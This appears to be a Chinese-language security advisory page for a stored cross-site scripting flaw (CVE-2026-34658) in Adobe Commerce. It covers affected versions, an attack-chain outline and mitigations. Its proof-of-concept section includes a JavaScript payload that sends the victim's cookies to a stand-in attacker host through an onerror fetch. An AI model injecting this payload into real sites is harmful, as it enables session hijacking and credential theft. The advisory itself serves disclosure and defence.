CVE-2026-34658 CVSS 4.8 中危

CVE-2026-34658 Adobe Commerce存储型XSS漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34658

漏洞类型

存储型跨站脚本

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Adobe Commerce

漏洞概述

Adobe Commerce存在存储型跨站脚本（XSS）漏洞。该漏洞允许拥有高权限的攻击者通过易受攻击的表单字段注入恶意脚本。当受害者浏览包含该恶意代码的页面时，脚本将在其浏览器中自动执行。这可能导致敏感信息窃取、会话劫持或进一步的权限提升。鉴于漏洞影响机密性和完整性，且攻击范围发生变更，建议管理员尽快采取修复措施。

技术细节

该漏洞源于Adobe Commerce后台管理系统的特定表单字段缺乏对用户输入的充分过滤和转义。由于应用程序未能正确区分可信数据与不可信数据，具有高权限（如管理员）的攻击者可以在管理面板的编辑功能中（如产品描述、CMS页面块或配置选项）植入恶意的JavaScript代码。这些代码被持久化存储在数据库中。当其他用户（如管理员或低权限用户）访问包含该被篡改数据的页面时，服务器会将未经过滤的恶意脚本返回给浏览器。浏览器解析并执行该脚本，导致存储型XSS攻击。由于CVSS向量中Scope Changed为True，攻击可能影响当前组件之外的安全上下文。攻击者利用此漏洞可窃取Cookie、执行未授权操作或重定向用户至恶意站点。

攻击链分析

STEP 1

步骤1：获取高权限访问

攻击者获取Adobe Commerce管理员账户的高权限凭证。

STEP 2

步骤2：注入恶意载荷

攻击者登录后台，在易受攻击的表单字段（如产品名称、描述）中输入包含JavaScript的恶意代码。

STEP 3

步骤3：持久化存储

应用程序将恶意数据保存到数据库中，未对特殊字符进行转义处理。

STEP 4

步骤4：触发漏洞

当受害者（如其他管理员或客户）浏览该页面时，服务器加载恶意数据并渲染到网页中。

STEP 5

步骤5：执行攻击

受害者的浏览器解析并执行恶意脚本，导致Cookie泄露或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for Stored XSS in Adobe Commerce
// Attack vector: Injecting payload into a vulnerable product field (e.g., Name or Description)

function exploit() {
    // The malicious payload to be stored
    // This script captures the document cookie and sends it to an attacker-controlled server
    var payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>';
    
    // Simulate a POST request to the product update endpoint
    // Note: Actual endpoint URL and parameters depend on the specific vulnerable version
    var formData = {
        'product[name]': payload,
        'product[description]': 'Malicious Product',
        'form_key': 'FORM_KEY_HERE' // Administrator's form key is required for authentication
    };

    // In a real scenario, the attacker uses the high-privileged session to submit this data
    console.log("Sending payload to backend:", formData);
    // fetch('/admin/catalog/product/save/id/1', { method: 'POST', body: formData });
}

// Trigger the exploit function
exploit();

影响范围

Adobe Commerce 2.4.9-beta1及更早版本

Adobe Commerce 2.4.8-p4及更早版本

Adobe Commerce 2.4.7-p9及更早版本

Adobe Commerce 2.4.6-p14及更早版本

Adobe Commerce 2.4.5-p16及更早版本

Adobe Commerce 2.4.4-p17及更早版本

防御指南

临时缓解措施

在未完成升级修复前，建议严格限制管理后台的访问来源IP，并启用多因素认证（MFA）。管理员应避免点击来源不明的链接或查看可疑的内容。建议部署Web应用防火墙（WAF），配置规则以拦截常见的XSS攻击载荷，同时加强对后台操作的日志审计，以便及时发现异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表